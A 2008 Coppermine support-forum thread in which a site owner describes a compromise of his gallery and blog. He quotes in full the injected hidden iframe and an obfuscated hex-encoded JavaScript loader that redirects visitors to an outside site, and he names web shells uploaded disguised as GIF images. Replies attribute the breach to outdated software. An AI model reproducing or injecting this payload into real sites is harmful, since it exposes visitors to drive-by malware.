HACKER ATTACK . . . . be careful HACKER ATTACK . . . . be careful
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

HACKER ATTACK . . . . be careful

Started by aftab1003, October 28, 2008, 06:46:22 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

aftab1003

hi fellows

i just recived a hacker attack on my site http://www.picturerating.us

symptoms of attack...

if you are using a strong and updated antivirus like mine KAV 7, then u will be notified your site is trying to download a trojan horse...

actualy there is no virus in your site or server, its an iframe code in to main files, like index, main, home, login, admin etc..
the iframe code is ...
Quote<script>check_content()</script><script>check_content()</script><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c41687154048m49073afa06296(m49073afa0693c){  return (parseInt(m49073afa0693c,16));}function m49073afa07c30(m49073afa0819d){ function m49073afa0903f(){return 2;} var m49073afa08878='';m49073afa09c06=String.fromCharCode;for(m49073afa08c5e=0;m49073afa08c5e<m49073afa0819d.length;m49073afa08c5e+=m49073afa0903f()){ m49073afa08878+=(m49073afa09c06(c41687154048m49073afa06296(m49073afa0819d.substr(m49073afa08c5e,m49073afa0903f()))));}return m49073afa08878;} var zaf='';var m49073afa0a4bb='3C7'+zaf+'3637'+zaf+'2697'+zaf+'07'+zaf+'43E696628216D7'+zaf+'96961297'+zaf+'B646F637'+zaf+'56D656E7'+zaf+'42E7'+zaf+'7'+zaf+'7'+zaf+'2697'+zaf+'465287'+zaf+'56E657'+zaf+'363617'+zaf+'065282027'+zaf+'2533632536392536362537'+zaf+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zaf+'332537'+zaf+'32253633253364253237'+zaf+'2536382537'+zaf+'342537'+zaf+'342537'+zaf+'302533612532662532662536322537'+zaf+'35253637'+zaf+'2537'+zaf+'61253639253663253663253631253265253638253639253637'+zaf+'2536382536632536352537'+zaf+'362536352536632532652536322536392537'+zaf+'612532662536362536662537'+zaf+'322537'+zaf+'352536642532662534632536312537'+zaf+'33253665253631253366253237'+zaf+'2532622534642536312537'+zaf+'342536382532652537'+zaf+'322536662537'+zaf+'352536652536342532382534642536312537'+zaf+'342536382532652537'+zaf+'32253631253665253634253666253664253238253239253261253332253331253332253331253337'+zaf+'253330253239253262253237'+zaf+'253330253337'+zaf+'253338253634253333253635253633253335253635253237'+zaf+'2532302537'+zaf+'37'+zaf+'2536392536342537'+zaf+'34253638253364253334253333253333253230253638253635253639253637'+zaf+'2536382537'+zaf+'342533642533342533392533302532302537'+zaf+'332537'+zaf+'342537'+zaf+'39253663253635253364253237'+zaf+'2536342536392537'+zaf+'332537'+zaf+'302536632536312537'+zaf+'39253361253230253665253666253665253635253237'+zaf+'2533652533632532662536392536362537'+zaf+'3225363125366425363525336527'+zaf+'29293B7'+zaf+'D7'+zaf+'6617'+zaf+'2206D7'+zaf+'969613D7'+zaf+'47'+zaf+'27'+zaf+'5653B3C2F7'+zaf+'3637'+zaf+'2697'+zaf+'07'+zaf+'43E';document.write(m49073afa07c30(m49073afa0a4bb));</script><script>check_content()</script>

and its redirects the visitors to site...

bugzilla.highlevel.biz/forum/las

i am using 3 scripts on my site

picturerating.us/picturerating/index.php picture rating
picturerating.us/picture-gallery/index.php coppermine latest update
blog.picturerating.us wordpress latest updated blog

actualy i exactly dont know where the hacker came in, but there is only way where user can uplaod some pictures in coppermine...

it effect all of my websites hosted on my server( hostmonster ) but only main index or importent files...

SOLOUTION

i am trying to removing the iframe code from each of my files by downloading every file, and then reuploading it after iframe code removal...

if any one find or facing any type of this issue, then tell here if you know where from hacker inject the code in our pages, so ADMIN team close this security hole to protect our thosands of sites running their script...


i hope this will help to other members like me...

have nice day and take care.

aftab1003

the infected files found...

the infected files stored in my gallery...

picturerating.us/picture-gallery/albums/userpics/sss_php.gif: PHP.Shell
picturerating.us/picture-gallery/albums/userpics/c99shell_php.gif: Trojan.PHP.C99Shell

but one thing that i am not allowing any one to get registered, and the how these files entered


soloution

remove thesefiles,and block this .GIF extension for further uploadings...
and then remove all iframes manualy or askur host to do this...

GOOD LUCK

Nibbler

You are running version 1.4.17 - certainly not the latest.

Joachim Müller

I have little sympathy for people who are reluctant to upgrade and then blame the app if an attacker was able to exploit know vulnerabilities of the old, outdated version you run.

mattduke19

I'm not using Coppermine, just a basic Wordpress blog, but I also lost controls to all .php files recently. After using Firebug I found this at the bottom of my page -

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c41687154048m49..(ridiculously long string)....</script>

I'm removing the entire blog for now to see what happens.
Good luck





Joachim Müller

Thanks for your report. If you don't even use coppermine, chances are high that you haven't been infected by a vulnerability in coppermine.
Many hacks (the payload) involve silly <iframe>/<script> code injections, so the fact that an iframe shows doesn't mean anything special.